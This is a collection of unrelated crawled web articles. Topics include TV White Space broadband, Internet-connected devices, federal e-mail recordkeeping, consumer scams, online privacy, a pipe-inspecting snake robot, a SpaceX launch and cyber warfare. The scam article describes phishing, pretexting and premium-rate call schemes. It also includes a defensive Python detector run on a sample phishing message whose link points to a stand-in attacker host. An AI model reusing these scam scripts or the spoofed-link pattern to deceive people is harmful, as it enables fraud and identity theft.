This cornerstone system, with adjustments over time for more frequencies and digital transmission technologies, has informed the broader telecommunications environment in ways the FCC could not have envisioned. The foundation for the cable industry’s breakthrough high-speed Internet specification, DOCSIS, has leaned mightily on the FCC’s channel allocation scheme for broadcast television by stuffing Internet packets into the same 6 MHz vessels that originally were sanctioned for over-the-air television. Only now, with the latest DOCSIS 3.1 iteration, does the specification abandon the notion of organizing bandwidth in 6 MHz chunks, instead inviting cable providers to assign whatever swaths of spectrum they choose for Internet traffic.
But the broadband Internet firmament will continue to borrow from the television past. In particular, an emerging approach for delivering high-speed Internet services wirelessly, known colloquially as TV White Space, mines familiar terrain. TV White Space implementations fetch unused slivers of spectrum originally assigned for TV broadcasts and run IP traffic across them, taking advantage of the same range and propagation qualities that have long benefitted broadcasters – hence the nickname “Super Wi-Fi.” The big difference is that the FCC treats TV White Spaces as unlicensed spectrum, meaning anyone can rig up a broadband IP network over these unused frequencies so long as they keep their signals from interfering with broadcasters’ assigned channels. (Database tables maintained by Google and others keep watch on which frequencies are available where.)
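Conceptually, the database check works like a simple availability query: given a device's location, return the TV channels with no licensed broadcaster there. The Python sketch below is purely illustrative — the channel plan, lookup table, and coordinates are invented, and real white-space databases expose regulator-approved APIs instead:

```python
# Hypothetical sketch of a white-space availability lookup.
ALL_TV_CHANNELS = set(range(2, 52))  # simplified US channel plan

# Invented sample data: channels licensed to broadcasters at a location.
LICENSED = {
    ("38.9072N", "77.0369W"): {4, 5, 7, 9, 20, 26, 32, 50},
}

def available_white_space(lat: str, lon: str) -> set:
    """Channels a white-space device may use at this location:
    everything in the plan minus the locally licensed channels."""
    return ALL_TV_CHANNELS - LICENSED.get((lat, lon), set())

print(sorted(available_white_space("38.9072N", "77.0369W"))[:5])
```

The device queries before transmitting and confines itself to the returned channels, which is how unlicensed operation avoids interfering with broadcasters' assigned frequencies.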
The FCC’s forthcoming auction of prized television spectrum complicates the picture for TV White Space a bit, giving would-be investors the shakes. But implementations are rising in the U.S. and elsewhere, with some backed by tech titans like Microsoft and Google.
In the fall of 1948, when the FCC took a breather to think carefully about how to orchestrate the development of TV broadcasting, the commission couldn’t have dreamed it would be influencing the development of broadband Internet access. But the decisions it made have done just that. Sixty-some years later, a scheme for over-the-air television might just change the landscape for high-speed Internet delivery, potentially helping to close broadband availability gaps for unserved communities. Score one for the freeze. | <urn:uuid:9c1c7381-cdab-4dfa-8057-ee774b0831ec> | CC-MAIN-2017-09 | https://www.cedmagazine.com/article/2014/02/memory-lane-broadband-alternative-heats | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00359-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949455 | 910 | 3.046875 | 3 |
Many are aware of the well-publicized Google Glass that pairs the Internet with a set of shades. What takes some by surprise, however, is how many other products have followed suit.
The trend has been dubbed with a variety of titles, such as the “Internet of Things” and the “Internet of Everything,” titles which — considering their ambiguity — could easily be dismissed for sheer lack of definition. However, a new report published by the Center for Data Innovation showcases just how diverse these “things” connected to the Internet can be.
Yes, that’s right, even garbage cans can now be online. In this case, they come from the BigBelly Solar company, which has created a solar-powered trash can and compactor that uses its online connection to alert sanitation crews when it is full. While this trash receptacle can be found in certain cities, corporate campuses, colleges and parks, the report identified Boston University as a user that was able to use the receptacle’s waste data to reduce average weekly trash pickups from 14 to 1.6.
Photo: Flickr/Elvert Barnes
Bridges are best when sturdy and without missing pieces. In order to improve safety, researchers and engineers in the U.S. and around the world are using bridge sensors that can detect structural changes. In South Korea the technology has been put to use in the Jindo Bridge with more than 600 wireless sensors. Locally, researchers at the University of Maryland, College Park are using the sensors on the state’s I-495 Bridge to send automated email and text alerts to engineers if a structural threat is detected.
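Most of the sensors in this list share the same basic pattern: sample a reading, compare it against a threshold, and notify someone. A minimal, vendor-neutral Python sketch of that pattern (all names and threshold values here are hypothetical):

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class SensorReading:
    sensor_id: str
    value: float  # e.g., a strain reading or fill level; units are illustrative

ALERT_THRESHOLD = 800.0  # hypothetical limit, not a real engineering figure

def check_and_alert(reading: SensorReading) -> Optional[str]:
    """Return an alert message if the reading crosses the threshold, else None."""
    if reading.value > ALERT_THRESHOLD:
        return (f"ALERT {reading.sensor_id}: value {reading.value} "
                f"exceeds {ALERT_THRESHOLD}")
    return None

print(check_and_alert(SensorReading("bridge-042", 950.0)))  # alert fires
print(check_and_alert(SensorReading("bridge-043", 120.0)))  # no alert
```

In deployed systems the notification step would send an email or text, as the Maryland bridge sensors do, rather than print to a console.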
Photo: Flickr/Joel Burslem
Whether to reduce congestion, help with trip planning or enforce parking violations, smart parking sensors are being put to use by businesses and municipalities alike. ParkSight, a company specializing in parking sensors, is offering businesses a network of self-powered, wireless parking sensors to collect real-time data on the occupancy of individual parking spaces. The information is then transmitted to parking facility operators and drivers. For drivers, the sensors are handy because they can tell them where spots are available, the cost of use, and the maximum time limit for parking. For facility operators, the sensors can track parking violators and be used for digital signage.
Photo: Flickr/Doug Waldron
In St. Louis, the public bus service MetroBus is using electronic sensors to collect information on bus speed, engine temperature and oil pressure. Service technicians then receive computer-generated recommendations on each vehicle’s maintenance needs. According to the report, the improved maintenance — or preventive care for buses — has saved the city $5 million per year in servicing costs and another $5 million in personnel-related costs.
This is a product that could benefit the food service industry’s infection-conscious consumers. HyGreen is currently using its hand-washing reminder and recording system in hospitals to prevent the spread of diseases. The system detects when someone is washing their hands, logging the worker’s location, ID number (via a small electronic badge) and the time. If an infection does occur within a hospital, the system provides hospital managers with better data to understand how and when it may have occurred.
Photo: Flickr/Horia Varlan
Offering parents and coaches a record of blunt force, a small and flexible sensor now links helmets to the Web. The sensor hails from Shockbox, a company that pitches the helmet sensor as a way to eliminate the guesswork on possible concussions and to improve injury notifications to parents.
The Shockbox mobile app shows the direction and severity of impacts while also noting the name of the player and the date and time of the event. If a concussion-level force does occur, parents and coaches can get notifications immediately through the app. According to the report, athletic head injuries cause 21 percent of traumatic brain injuries among U.S. children and teens.
Photo: Flickr/Keith Allison
Produced by the companies GE and Quirky, the Egg Minder is an egg carton that notes the number of eggs in the container and the length of time they’ve been sitting. The smart carton works by using sensors implanted in the bottom of each of the 14 egg cups. A line of LED lights in the tray displays which eggs are oldest and need to be used first. The tray also functions as a grocery list reminder, sending a smartphone alert when eggs are running low.
Photo: Flickr/Mark Turnauckas
Prescriptions are prescribed for a reason, but that doesn’t mean they’re heeded. In response to our forgetful nature, Vitality has invented smart pill bottles, "GlowCaps," that act as a gentle reminder when a patient has forgotten to take a dose. The bottle triggers a series of escalating notifications that include flashing lights, text messages, audio reminders and phone calls. The tiny canister can detect when a patient opens and closes the bottle and notes each opening as a dose. As an added benefit, family members, caregivers and doctors can have access to dosage reports online. The report’s research said the smart pill bottles from Vitality have increased medication compliance in users from about 70 to 95 percent. The health-care costs linked with noncompliance with prescribed medications are estimated to be $290 billion annually in the U.S.
If homeowners are looking for a real-time account of their water usage — to identify a leak, be more conservative, or just check the accuracy of a utility bill — Belkin Echo Water has created a water monitoring system that can put home plumbing online. The system employs sensors to chronicle water usage through the vibrations in pipes and then use algorithms to analyze those vibrations, identifying water fixtures (including showers, toilets and irrigation) and logging when each is used, how long, and the amount of water consumed. The system is expected to be rolled out to the public in 2014.
Digital products can now send air quality data to a smartphone. One such product is the Air Quality Egg, a device that senses and collects data about air quality in a home or office. The data is gathered in real time and is relayed over the Internet where a website aggregates the data from every “Egg” in use. The result is a network of air quality data, reporting on levels of carbon monoxide and nitrogen monoxide. While the EPA publishes daily pollutant levels from centralized locations in metropolitan areas, the Egg offers specific data for personal use. | <urn:uuid:d9deb282-1f19-487f-b172-d708c4372007> | CC-MAIN-2017-09 | http://www.govtech.com/internet/10-Surprising-Things-Connected-to-the-Internet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00235-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.939286 | 1,340 | 2.640625 | 3 |
Old-school recordkeeping meets the Digital Age
How does the government manage data that was born digital, meaning it was created in electronic form? Organizations as varied as the National Archives and Records Administration (NARA), the White House, open-government groups, and House members have recently offered recommendations for managing the growing volume of such information. Their approaches underscore the differences of opinion about how much responsibility and power various entities should have over future federal recordkeeping.
Electronic records management has been the topic of proposed legislation and rules, court cases, congressional investigations, hearings, and government audits as agencies weigh options for maintaining the vast amount of official communication that is conducted electronically. Because federal employees use e-mail and other technologies daily for routine notes and important information, it’s not always easy to decide which messages qualify as records that must be preserved. And once a decision is made, the next question is how best to store the messages.
Under the Federal Records Act, NARA approves agencies’ recordkeeping schedules and maintains data once it is submitted for archiving, but each agency decides whether to keep a document. In the case of e-mail messages, individual users typically make the decision.
“I think there is a growing consensus that electronic mail and other forms of electronic records that are born digital need to be managed and preserved in electronic form,” said Jason Baron, NARA’s director of litigation.
But lacking a statutory prescription for maintaining electronic records, most agencies print and file them as they would paper documents, according to a recent investigation by the Government Accountability Office. GAO’s report states that top agency officials are not properly maintaining their electronic communications, and NARA has not been inspecting agencies’ recordkeeping practices.
Those revelations provided fuel for House Democrats who were already angered by allegations that White House officials lost millions of e-mail messages generated during the prelude to the invasion of Iraq.
NARA has less power over how a presidential administration handles its records while in office. The Presidential Records Act governs the White House.
On July 9, the House passed the Electronic Message Preservation Act, a bill that would amend both the Presidential Records and Federal Records acts and significantly increase the authority NARA has over the White House’s recordkeeping practices. The measure would also require agencies to preserve electronic communications in a NARA-approved format.
Bush administration officials have indicated that the president would veto the measure. An administration statement also said the proposed reforms for presidential records would “upset the delicate separation-of-powers balance” by giving NARA new authority over a presidential administration.
However, open-government groups say the measure does not go far enough.
On July 31, NARA issued guidance to help agencies use e-mail archiving applications. The agency also has proposed new recordkeeping regulations that would define electronic records management in broader terms and provide guidance for inspections of agency records management practices.
How much power should NARA have?
Although NARA, open-government groups and lawmakers share the goal of improving the management of federal and presidential records, their ideas about what approach to take vary widely.
In particular, they disagree on the role NARA should play in enforcing agencies’ recordkeeping practices. Some experts say NARA should abandon its cooperative stance toward agencies and become more of an enforcer.
“The problem NARA has is — and they admit this — they operate on a sort of friendly basis with agencies, and they don’t threaten them,” said Meredith Fuchs, general counsel at George Washington University’s National Security Archive. “They don’t push too hard.”
The National Security Archive, a research institute and library, has filed about 35,000 Freedom of Information Act requests since its inception in 1985. It is one of the groups suing the Bush administration for allegedly failing to archive millions of e-mail messages.
The bill that passed the House in July would require NARA to issue regulations to compel agencies to preserve electronic messages in an electronic format and create certification standards for agencies’ electronic records management systems. The White House would need to meet a similar standard determined by NARA, and presidential recordkeeping practices would be subject to the agency’s approval.
NARA officials have publicly questioned whether the Justice Department would support the agency’s increased oversight role in presidential recordkeeping.
A proposed rule change published in the Aug. 4 Federal Register would have NARA providing guidance for its inspections of agencies’ records management practices. Furthermore, officials would undertake inspections when an agency fails to address risks or specific problems, the notice states.
Nancy Allard, a senior policy specialist at NARA, said the proposed regulations would make inspections more focused.
“What we are looking at is how we can do a combination of more effective agency self-assessment and then planned targeting for a specific issue and what will invoke an inspection,” she said.
Patrice McDermott, director of OpenTheGovernment.org, said she found NARA’s proposed changes to be disappointing because they only called for inspections in high-risk situations. NARA “has chosen, once again, to reject its ongoing responsibility to conduct inspections or surveys of the records and the records management programs and practices within and between federal agencies,” she said.
On the other hand, J. Timothy Sprehe, a records management expert who often writes about the topic in his Federal Computer Week column, said NARA already has enough to do. Rather than giving the agency more oversight responsibilities, the best plan would be to automate electronic recordkeeping, he said.
Are all records created equal?
Under current regulations, NARA does not require agencies to maintain records in their native formats. So for now, many agencies still print e-mail messages and file the paper versions.
Although the filing process is relatively easy, the practice has a major weakness: It eliminates the searchability of digital documents.
“Those laws didn’t really anticipate the development of our electronic communications systems, and so the agencies on their own have not taken the initiative to deal with all of this,” Fuchs said.
NARA’s Electronic Records Archives system, which is in development, will have an enhanced ability to maintain records in all electronic formats — a capability that will become increasingly necessary as the demand for electronic discovery for legal cases grows.
Baron said NARA’s recent guidance about e-mail archiving applications was important because it reminded agencies that adopting such tools does not necessarily mean they are managing records correctly.
Agencies “need to be aware of the records management implications of [saving everything] and take steps to think about what makes sense in terms of saving permanent records and being able to tag and dispose of temporary records,” he added.
NARA’s July 31 guidance outlined the benefits and drawbacks of using e-mail archiving technology to retain electronic messages that qualify as records. It also required agencies to provide training to ensure that their employees maintain the records correctly.
Baron said NARA has been addressing federal electronic records management for decades, and the adoption of electronic records management tools by agencies offers a mixed picture.
“This is a universal problem,” he said. “It’s a matter of public trust — and that’s why it’s important for federal agencies to be aware of their options with respect to preserving information in electronic form.” | <urn:uuid:8cec10ef-793c-4f3e-9048-59667e1733d6> | CC-MAIN-2017-09 | https://fcw.com/articles/2008/08/15/oldschool-recordkeeping-meets-the-digital-age.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00355-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949066 | 1,545 | 2.828125 | 3 |
Here are some common scams along with ways to protect yourself:
U.S. Census Scam
How it works: Someone calls you claiming to be from the Census, the IRS or other “trusted” organization and asks you to divulge personal financial information, donations, and/or Social Security numbers. In addition, fraudsters now have devices that can make Caller ID display any number or name they choose such as "U.S. Census" or a similar identifier. In rare instances, a Census worker may call to clarify information you've submitted, according to the Census Web site.
How to protect yourself: Never give out financial or personal information over the phone unless you are certain of the identity of the person or company who is requesting it.
Phishing Scam

How it works: Phishing e-mail messages are designed to steal your identity. They get your personal data by directing you to phony but very realistic "secure" Web sites. The phony URL is a total knock-off of a company's legitimate log-in site. The sole purpose is to trick you into divulging your personal information so the operators can steal your identity and run up bills or commit crimes in your name.
How to protect yourself: Legitimate companies don’t ask for personal information via email. If you are concerned about your account, contact the company mentioned in the email using a telephone number you know to be genuine. Don’t cut and paste the link from the message into your Internet browser — phishers can make links look like they go to one place, but that actually send you to a different site. Also, review credit card and bank account statements as soon as you receive them to check for unauthorized charges.
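As a rough illustration of that last point, the mismatch between a link's visible text and its actual destination can often be detected mechanically. The sketch below (stdlib-only Python, with a made-up example message) flags anchors whose displayed host differs from the href's host:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkAuditor(HTMLParser):
    """Collect (href, visible text) pairs for every anchor tag."""
    def __init__(self):
        super().__init__()
        self._href = None
        self._text = []
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def looks_spoofed(href, text):
    """Flag anchors whose visible text names a different host than the href."""
    if " " in text or "." not in text:
        return False  # visible text is not claiming to be a URL
    shown = urlparse(text if "://" in text else "http://" + text).hostname
    real = urlparse(href).hostname
    return bool(shown) and bool(real) and shown != real

# Hypothetical phishing message: the text says "mybank", the link goes elsewhere.
html = '<p>Verify your account at <a href="http://evil.example.net/login">www.mybank.com</a></p>'
auditor = LinkAuditor()
auditor.feed(html)
for href, text in auditor.links:
    if looks_spoofed(href, text):
        print("Suspicious link:", text, "->", href)
```

Real mail clients and gateways use far more signals than this, but hovering over a link to compare the displayed address with the real one is exactly this check done by hand.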
Mystery Shopper Scam
How it works: You receive a notice stating that you’ve been selected to participate in a “Mystery Shopper” program. Along with the notice, you receive a check and are asked to wire money back through a money transfer company such as MoneyGram.
How to protect yourself: If you receive this type of notice, delete it or throw it away. Do not send the money and do not cash the check.
Slamming and Cramming

How it works: Slamming is a term for an unauthorized change to your long distance company. This often happens when you sign up for a contest or other marketing promotion without checking the fine print. The company then has authority to switch you from your current long distance company. Cramming is similar, but involves a company placing an unauthorized miscellaneous charge on your phone bill. This could involve a charge for a voice mail service, Internet access services, or other service charges.
How to protect yourself: Read the fine print when you agree to a sales pitch or contest over the phone or in person and check all details on your phone bill regularly. If you see a suspicious charge, use the contact information provided to ask about the charge. If you cannot resolve the situation and you didn't authorize the charge, contact CenturyLink.
Advance Fee Scam
How it works: You receive a letter, fax or email from someone claiming to be or to have connections with foreign government officials who have access to millions of dollars in untraceable funds that they want to transfer out of their country. All you have to do is reply and provide your bank account information so the money can be transferred to a legitimate recipient - you. They will then demand that you send them money to cover the bribes and other expenses associated with the transfer. After many months, you finally learn that you got nothing from the deal but money taken from your bank account.
How to protect yourself: Don’t fall for get-rich-quick schemes. Delete, shred or throw away any correspondence you may receive.
Pretexting

How it works: This is a general term that involves someone trying to convince you that they are someone they're not, in order to collect critical personal information from you. Sometimes that person will claim to be a phone company representative. The person may say you overpaid your last phone bill and they need some information from you, including your Social Security number, to process a refund check.
How to protect yourself: Overpayments are almost always applied to your next bill with no need to call you to process a refund. Ask questions and for a callback number but do not provide personal information over the phone or via email.
809 Area Code Scam

How it works: In this scam, you might receive an email, page, or cell phone text message urgently asking you to call someone in the "809" area code or some other area code that you normally don't call. If you make the call, you may unwittingly dial into an expensive overseas pay-per-call service, resulting in large charges being placed on your next phone bill.
How to protect yourself: If you don't recognize the phone number or area code, don't return the call.
Bottom line: Never give out information to people you don’t know, and always review your phone bill carefully. If you see any suspicious activity, contact CenturyLink at the number listed on your bill. By working together, we can help reduce scams that take advantage of our customers.
CenturyLink is a leading provider of high-quality voice, broadband and video services over its advanced communications networks to consumers and businesses in 33 states.
After a successful liftoff this morning, the SpaceX Dragon spacecraft is on its way to rendezvous with the International Space Station.
"Very excited to be back here. We're a launch company and we love to launch," said Gwynne Shotwell, president of SpaceX, before launch. "We're prepared to fly."
However, the flight hasn't been without issue.
Shortly after Dragon reached orbit, SpaceX founder and CEO Elon Musk reported on Twitter that there was a problem with the Dragon spacecraft's thruster pods, delaying the deployment of the craft's solar array, which powers it.
"Issue with Dragon thruster pods. System inhibiting three of four from initializing. About to command inhibit override," Musk tweeted. "Holding on solar array deployment until at least two thruster pods are active."
At approximately 11:50 a.m. ET, the Dragon's solar arrays were successfully deployed.
The SpaceX Falcon 9 rocket, carrying the unmanned Dragon capsule, lifted off from Cape Canaveral Air Force Station in Florida at 10:10 a.m. ET today. The spacecraft, which is scheduled to rendezvous with the space station on Saturday, is ferrying 1,268 pounds of scientific experiments and supplies for the space station crew to the orbiter.
Using a robotic arm onboard the space station, two astronauts on Saturday are set to grab hold of the Dragon capsule and attach it to the station. The capsule will stay attached for about three weeks, returning to Earth on March 25.
Today's launch is the second of 12 SpaceX flights contracted by NASA to resupply the space station. It also will be the third trip by a Dragon capsule to the orbiting laboratory.
After SpaceX made a demonstration flight in May 2012, it then launched the first official resupply mission last October, delivering 882 pounds of supplies.
Another successful commercial launch is an important milestone for NASA, which now depends on commercial flights since retiring the agency's fleet of space shuttles in the summer of 2011. For the foreseeable future, NASA will need commercial missions to ferry supplies, and possibly even astronauts, to the space station, while the space agency focuses on developing robotics and big engines in preparation for missions to the moon, asteroids and Mars.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "NASA, SpaceX launch Dragon but glitch delays power supply" was originally published by Computerworld. | <urn:uuid:0db81c83-4c93-465d-b24f-6969adcbc746> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2164033/data-center/nasa--spacex-launch-dragon-but-glitch-delays-power-supply.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944557 | 565 | 2.640625 | 3 |
A snake has been moving through the pipes and systems of a nuclear power plant near Vienna, Austria.
It may not be as creepy as you think. This particular snake is a multi-jointed robotic machine.
Carnegie Mellon University's robotic snake climbs a 1-in. machinery cord at the Zwentendorf nuclear power plant in Austria. (Photo: Carnegie Mellon)
The robot, which is 37 inches long and two inches in diameter, is tethered to a control and power cable. The robot crawled through the Zwentendorf nuclear power plant's steam pipes and connecting vessels as a test of its abilities.
The robotic snake proved it was able to maneuver through multiple bends, slip through open valves and negotiate vessels with multiple openings, according to researchers at Carnegie Mellon University's Robotics Institute, where it was developed.
That means the robot can inspect areas of the power plant that previously had been unreachable.
"Our robot can go places people can't, particularly in areas of power plants that are radioactively contaminated," said Howie Choset , a robotics professor at Carnegie Mellon. "It can go up and around multiple bends, something you can't do with a conventional borescope, a flexible tube that can only be pushed through a pipe like a wet noodle."
The robot, which also has been tested in search-and-rescue environments, is made up of 16 modules, each with two half-joints that connect with corresponding half-joints on adjoining modules. It also has 16 degrees of freedom, enabling it to assume a number of configurations and to move using a variety of gaits.
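Gait generation for this kind of robot is commonly done with phase-shifted sine waves along the body (the "serpenoid" parameterization from the snake-robot literature). The sketch below is a generic illustration of that idea, not the actual CMU controller, and the amplitude and frequency values are invented:

```python
import math

def serpenoid_angles(n_joints, t, amplitude=0.5, temporal_freq=0.8, spatial_freq=0.6, offset=0.0):
    """Joint angles (radians) for a lateral-undulation gait at time t.

    Each joint follows a sine wave shifted in phase along the body, so a
    travelling wave propagates from head to tail and pushes the robot forward.
    """
    return [
        offset + amplitude * math.sin(2 * math.pi * temporal_freq * t + spatial_freq * i)
        for i in range(n_joints)
    ]

# Sample a 16-joint robot at two instants; the wave pattern visibly shifts.
for t in (0.0, 0.25):
    angles = serpenoid_angles(16, t)
    print(f"t={t:.2f}s:", " ".join(f"{a:+.2f}" for a in angles))
```

Different gaits (rolling, climbing the inside of a pipe, pole climbing) come from varying the amplitudes, frequencies and offsets applied to the alternating horizontal and vertical joints.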
The robot has a video camera and LED light attached to its head, giving its controllers an image of what it's approaching. The university explained that even though the robotic snake is twisting, turning and rotating as it moves through pipes and over obstacles, the image remains steady because it's automatically corrected to be aligned with gravity.
The university's robotic research team sent the snake into a variety of pipes at the power plant, which was built in the 1970s but never used. Since it doesn't have any radioactive contamination, the plant was ideal for testing the robot.
Nuclear power plants in general have miles of pipes for carrying water and steam. Much of that piping is difficult or nearly impossible to inspect because of its positioning and because radioactivity limits people from being in specific areas.
Kevin Lipkin, senior systems engineer at the Robotics Institute, said in a statement that the longest deployment in a pipe during the Zwentendorf testing was 60 feet.
"We could have gone farther, but we need to figure out how to best manage longer deployments," he said. "We were just being cautious because it was our first time in this plant."
Carnegie Mellon scientists aren't the only ones who have been working on robotic snakes.
In 2008, the Sintef Group, a research company based in Trondheim, Norway, announced that it had designed its own robotic snake. Sintef's robotic snakes were 1.5 meters long and made of aluminum. They were designed to inspect and clean complicated industrial pipe systems that are typically narrow and inaccessible to humans. These robots also had multiple joints that enabled them to twist vertically and climb up through pipe systems to locate leaks in water systems, inspect oil and gas pipelines and clean ventilation systems.
This story, "Robotic snake ssslithers through nuclear plant" was originally published by Computerworld. | <urn:uuid:0513a531-79d5-4a69-b1f8-aaccf90adbaa> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2168012/data-center/robotic-snake-ssslithers-through-nuclear-plant.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.969612 | 790 | 3.640625 | 4 |
An old saying holds that "nature abhors a vacuum," meaning that in the absence of something, nature will find a way of filling that gap. We are currently witnessing the same phenomenon in the information security field.
Information security has grown from being a small subset of IT to now being something of critical importance, not just to organizations but also to industries, economies and nations. As we become more and more dependent on the Internet, and computers control more and more of our daily lives, they also become a bigger risk to the stability of our businesses, economies, and our critical network infrastructure.
These risks have been recognized by governments around the world. US President Barack Obama has stated that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Jonathan Evans, head of the UK’s secret service MI5, highlighted in July 2012 that the online threat to the United Kingdom was comparable to that posed by terrorists and said there were “industrial-scale processes involving many thousands of people lying behind both state sponsored cyber espionage and organized cybercrime”.
Yet despite all this rhetoric about computer security, there is still a lack of clear leadership on how to deal with the problem. Various countries have published their cyber security strategies, yet many have not shown any evidence of implementing those strategies in any demonstrable manner. We have seen individuals appointed as cyber security advisor (or tsar) positions in a number of countries, who then quickly resign and cite the lack of resources and support as obstacles to fulfilling their roles effectively.
The Convention on Cybercrime was one of the first treaties developed to provide an international legal framework for dealing with online criminal acts. However, since its adoption by the Committee of Ministers of the Council of Europe in 2001, only thirty of the forty-seven countries that have signed the agreement have actually ratified it and made it law.
Many businesses are also failing to tackle this important issue. Not a day goes by that we don’t hear about another company suffering a security breach. Many of these breaches are avoidable, as shown by Verizon’s Data Breach Investigations Report, which found that nearly 97% of the breaches investigated in 2012 were avoidable using simple controls.
While many countries and organizations are failing to deal with computer security, others are seeing this failure as an opportunity. Criminals are quickly expanding their operations into the online arena, and they see the Internet as a fertile environment for making large amounts of money. Activists are using the Internet, and in particular social media, to publicize their causes and promote their messages. Hostile nation states, industrial espionage groups, and dissident groups are also looking to exploit our inability to work together to secure our systems.
Another group taking advantage of the confusion and lack of understanding in this arena are large lobby groups working on behalf of the defense and weapons industries. It is in the interest of these lobby groups to highlight the threat from online based attacks and look for governments to invest money and resources in this area.
All of the above operators are creating what I see as a perfect storm of confusion and mistrust, which I believe will cause great damage to all computer and Internet users. Overhyped threats and a lack of understanding of the problem will lead to overreaction by governments as they respond to the threat du jour as presented to them by the lobby groups. In the effort to appear to be dealing with these perceived threats, governments may introduce new laws that may not only fail to solve the problem, but will also negatively impact our privacy and online freedoms. We can already see this happening with lobby groups representing media organizations. They are successfully pushing laws dealing with copyright changes in order to protect their industries while legislation such as the Convention on Cybercrime – which could help address a lot of the issues we face – is ignored.
To counter this, the information security community needs to step up and provide the leadership required to ensure we maintain the security of the Internet while preserving our freedoms and rights. We can no longer afford to let others such as vendors, lobby groups, or politicians drive the agenda.
So I ask each of you to use whatever influence you have to ensure that those making policy decisions, whether in business or otherwise, are properly informed of what the real issues and preferred solutions are. Engage in a positive way with others, especially those outside our community, using blogs, social media or commenting on news stories so they are better informed on what the real issues are. In addition to all this, we also need to speak up when vendors and other interest groups overhype an issue for their own gain, and challenge their assertions. Finally, contact politicians to point out the threats that we face from criminals, badly thought out legislation and lobby groups forcing attention away from the real issues.
The Internet is a fantastic place; let’s make the effort to ensure it remains that way.
Brian Honan is an independent security consultant based in Dublin, Ireland, and is the founder and head of IRISSCERT, Ireland’s first CERT. He is a Special Advisor to the Europol Cybercrime Centre, an adjunct lecturer on Information Security in University College Dublin, and he sits on the Technical Advisory Board for a number of innovative information security companies. He has addressed a number of major conferences, wrote the book ISO 27001 in a Windows Environment, and co-authored The Cloud Security Rules. He regularly contributes to a number of industry recognized publications and serves as the European Editor for the SANS Institute’s weekly SANS NewsBites.
More Americans are concerned about not knowing how the personal information collected about them online is used than about losing their principal source of income.
A new study by TRUSTe and the National Cyber Security Alliance found that online privacy concerns topped the loss of personal income by 11 percentage points, even as only 3 in 10 (31%) Americans understand how companies share their personal information.
Likewise, the business impact of consumers’ privacy concerns remains high with 89 percent avoiding companies they don’t believe protect their privacy and 74 percent of those who worry about their privacy online limiting their online activity in the last 12 months due to their concerns.
Just 56 percent of Americans trust businesses with their personal information online, revealing a striking trust gap. To close this gap, consumers appear to be demanding more transparency in exchange for trust and want to be able to control how data is collected, used and shared, with simpler tools to help them manage their privacy online.
46 percent don’t feel they have control of any personal information they may have provided online, 32 percent think protecting personal information online is too complex and 38 percent of those who worry about their privacy online say companies providing clear procedures for removing personal information would increase trust.
Interestingly, given the recent introduction of the so-called ‘Right to be Forgotten’ for Europeans in the EU General Data Protection Regulation, 60 percent of their American counterparts think they also have the right to be forgotten.
With the terrorist attacks in Paris occurring the month before this survey was conducted, the number who think online privacy is more important than national security has fallen to 38 percent, down seven percentage points from last year’s study. 37 percent think losing online privacy is a part of being more connected.
Among all online adults, 36 percent have stopped using a website and 29 percent have stopped using an app in the last twelve months because they did not trust them to handle personal information securely. 47 percent of adults who have stopped using either a website or app said that this was because they were asked to provide too much information. Interestingly 19 percent said they continued to use a website they didn’t trust to handle their personal information responsibly, with 31 percent of those who reported doing this saying it was because it was the only website that sold a particular product or service.
Trust remains a significant issue with 56 percent of American Internet users trusting most businesses with their personal information online. Healthcare providers (74 percent) and financial organizations (72 percent) were most trusted to handle personal information responsibly. Social Networks (35 percent) and advertisers (25 percent) were the least trusted.
There is more that businesses can do to lower consumer concern and improve trust. Among those who worry about their privacy online, the two top ways to lower privacy concerns were companies being more transparent about how they are collecting and using data (35 percent) and having more easy to use tools available to protect personal information (35 percent). | <urn:uuid:b455da23-03c3-4754-8cb8-6a775995c101> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2016/01/29/consumers-are-increasingly-concerned-about-privacy-and-theyre-acting-on-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00103-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964641 | 595 | 2.671875 | 3 |
Uncertain State Of Cyber War

Just what does "cyber warfare" mean? We're still figuring out tactics and capabilities.
Military agencies worldwide are right in the middle of figuring out the tactics and capabilities that will be critical in any future cyber war. So far, any conflicts are playing out behind the scenes, with only the rare accusation or public request for technology giving a glimpse into what offensive attacks between countries might look like.
Even what counts as "cyber warfare" remains an open question. Many cite as the first-known example of such operations the distributed denial-of-service (DDoS) takedowns and hijacking of government and business websites in the country of Georgia in 2008, at the same time as Russian military operations on the ground.
